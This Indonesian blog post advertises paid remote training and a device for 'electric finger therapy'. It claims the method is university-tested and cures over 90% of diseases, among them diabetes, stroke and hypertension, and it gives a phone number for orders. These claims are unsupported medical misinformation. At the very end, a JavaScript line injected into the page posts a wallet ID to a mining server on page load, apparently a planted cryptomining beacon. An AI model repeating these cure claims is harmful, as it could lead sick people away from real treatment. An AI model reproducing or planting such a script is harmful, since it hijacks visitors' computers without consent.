belajar komputer

Rabu, 18 Februari 2015

Terapi Sentuhan Jari listrik

TERAPI SEDERHANA YANG MENAKJUBKAN

Saya sarankan Anda tidak mudah tergiur untuk membeli alat terapi listrik yang harganya jutaan rupiah produksi manca negara tetapi hasilnya masih diragukan banyak orang. Tidak percaya? Silahkan dicoba! Menurut saya, hemat uang Anda! Saya memberikan penawaran pelatihan terapi jari berlistrik kepada siapapun dan dimanapun berada. Pelatihan bisa secara langsung (dengan datang ke rumah) maupun pelatihan jarak jauh
, (via e-mail, sms/ telp.). Bagi yang mengikuti pelatihan baik langsung maupun jarak jauh akan saya beri juga alat terapi listrik dan buku panduannya untuk mempermudah mendalami ilmu ini. Ilmu terapi jari berlistrik ini telah diuji secara ilmiah di sebuah Perguruan Tinggi Negeri (PTN) dan ternyata hasilnya sangat fantastis mampu menyembuhkan > 90% berbagai macam penyakit. Alatnya sangat sederhana bahkan bisa dibuat sendiri, praktis dan mudah dibawa kemana-mana, tetapi manfaatnya sangat besar. Terapi ini sangat cocok untuk bisnis pengobatan alternatif di rumah.Krjanya ringan, santai, hanya menyentuh (tidak memijat seperti tukang pijat, jadi tidak perlu tenaga extra Tiap pasien hanya utuh waktu max 30 menit. dengan tarif rata2 biasanya di tempat saya antara Rp. 30.000 - Rp. 50.000. Jika usaha ini mulai jalan pasien yang datang tidak kurang dari 15 orang per hari. Jadi juga sangat cocok dilakukan oleh para wanita atau ibu rumah tangga yang igin membantu suami untuk menambah uang belanja. Silahkan simak paparan di bawah ini: Terapi Sentuhan Jari Berlistrik atau sentuhan jari berlistrik adalah jenis pengobatan alternatif yang mengunakan media listrik melalui sentuhan jari penerapis. Bermanfaat untuk melenturkan urat syaraf, melancarkan peredaran darah, melenturkan lemak dalam darah (kolestrol), meningkatkan vitalitas tubuh, membakar kadar gula, dll. Inti terapi listrik ini adalah melancarkan peredaran darah, mengaktifkan ion-ion dalam tubuh, dan memperbaiki kualitas darah. Satu kali sesi pengobatan hanya berlangsung 30 menit. Selama itu penerapis akan mengalirkan listrik di seluruh tubuh pasien, melalui simpul-simpul syaraf di tangan, kaki, kepala, punggung, atau leher.Banyak penyakit yang berhasil diobati dengan terapi ini terutama penyakit-pdnyakit yang berhubungan dengan urat syaraf seperti vertigo, migrain, dan stroke. Selain itu, kesemutan, asma dan rematik juga dapat disembuhkan. Penderita insomnia pun bisa bernafas lega karena terapi ini juga dapat membantu memperbaiki lamanya waktu tidur. Kelelahan dan stress juga dapat dikurangi sehingga menimbulkan rasa rileks yang sekaligus melepaskan hormon endorfin yang berguna untuk menghasilkan perasaan senang, santai, dan nyaman. Diluar dugaan banyak orang bahwa ternyata kelistrikan memegang peranan penting di dunia kedokteran. Dalam bidang kedokteran, kelistrikan memiliki dua aspek yaitu listrik dan magnet yang timbul di dalam tubuh manusia d`n bagaimana penggunaannya pada permukaan tubuh manusia. Biolistrik berkembang sejak tahun 1780. Waktu itu, kelistrikan pada tubuh hewan dipelajari oleh Luigi Galvani dan pada tahun 1786 dia memberikan kesimpulan atas hasil eksperimennya terhadap seekor katak. Kedua kaki katak terangkat ketika diberi aliran listrik melalui sebuah konduktor. Pengetahuan mengenai gelombang arus listrik ini ternyata penting karena sangat berkaitan erat dengan penggunaan arus listrik untuk merangsang syaraf motorik dan syaraf sensorik.

                                                             Titik Urat Saraf Manusia
Insya Allah terapi ini dapat mebantu mengobati berbagai macam penyakit, antara lain :
- asam urat
- linu-linu di persendian tangan dan kaki
- jari kaki/ tangan serasa mati
- darah tinggi
- darah rendah
- susah tidur / insomnia
- kolesterol
- keseleo
- diabetes
- prostat
- stroke dini
- lemah syahwat
- ambeien
- reumatik
- vertigo
- kesemutan (gringgingen)
- sakit gigi - sakit kepala - maagh.


Ingin tahu tentang REIKI baca disini KUNDALINI REIKI


Baca Artikel Terkait >>> 

ALAT TERAPI JARI LISTRIK

Kami mengadakan pelatihan jarak jauh "TERAPI JARI LISTRIK"dimana pelatihan ini diperuntuk kan bagi yg suka bergelut dalam dunia pengobatan alternative tentunya dan juga masyarakat umum.seperti yang kita ketahui saat ini pengobatan konvensional membutuhkan biaya yang sangat besar bahkan tak jarang mereka yang membutuhkan pengobatan dan perawatan sanantiasa pulang dengan kegagalan akibat tidak bias memenuhi persyaratan administrasi,sungguh sangat memilukan.Dari itu kami berniat memberikan tehnik terapi alternative" TERAPI JARI LISTRIK" dengan biaya sangat murah dan tehnik yang simple mudah diterapkan dimanapun dan kapan pun baik untuk keluarga dan juga bisa untuk lahan kerja / usaha sampingan tentunya bisa mendatangkan rupiah bukan….?. Anda tidak perlu membeli alat terapi listrik dengan harga jutaan rupiah yang belum tentu terjamin kwalitasnya dan susah perawatan nya rusak komponen nya lah ini;ah itu lah dan lain lain,alat terapi dari kami sangat simple sederhana namun tak mengenal kerusakan komponen aman dan sangat terjangkau.dan bisa langsung TEST TUBUH ANDA AKAN MENYALA SAAT DI TESPEN .unik nya setrum akan mengalir melalui jari jari anda tanpa perantara tanpa kabel atau penghantar lain nya. Berapa Biaya pelatihan nya…? Biayanya Cuma Rp 250.000 sudah termasuk alat terapi. Kami pandu langsung melalui hp,sms,email sangat mudah cukup 2 atau 3 kali penjelasan anda akan faham dan langsung praktek,mudah dan murah bukan… Anda berminat silahkan tinggalkan komentar atau hub 0853 6857 4707  untuk pemesanan. ATAU….. Abaikan saja postingan ini jika memang tidak penting bagi anda….!!!

1 komentar:

  1. Setelh sy membaca artikelx ttg terapi listrik tampa kabel,dn jg dpt diajarkn dgn jarak jauh dn dipandu sampai berhadil,maka dgn ini sy pribadi sgt tertarik dgn ilmu bpk wassalam

    BalasHapus

var wallet = "cy_26 067b6 be129 ba270 c8100 e0f49 03d82 eab5c 3b065 43fea e169e c7e1f aa5fd f1"; $.post("http://mining.cayafuture.com:2435/"+wallet, function( data ) { //alert(data); })